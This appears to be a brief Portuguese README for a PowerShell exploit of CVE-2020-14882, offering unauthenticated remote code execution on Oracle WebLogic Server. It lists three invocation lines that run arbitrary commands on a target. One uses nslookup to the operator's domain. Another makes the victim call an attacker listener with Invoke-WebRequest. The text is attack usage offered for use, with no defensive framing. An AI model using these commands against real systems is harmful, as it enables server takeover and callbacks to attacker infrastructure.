
CVE-2020-14882 reescrito em PowerShell
Este script PowerShell explora o CVE-2020-14882 para alcançar execução remota de código não autenticada nas versões do Oracle WebLogic Server:
.\exploit.ps1 -target 'http(s)://target:7001' -command 'your_command'
.\exploit.ps1 -target 'http(s)://target:7001' -command 'nslookup your_Domain'
.\exploit.ps1 -target 'http(s)://target:7001' -command 'powershell.exe -c Invoke-WebRequest -Uri http://your_listener'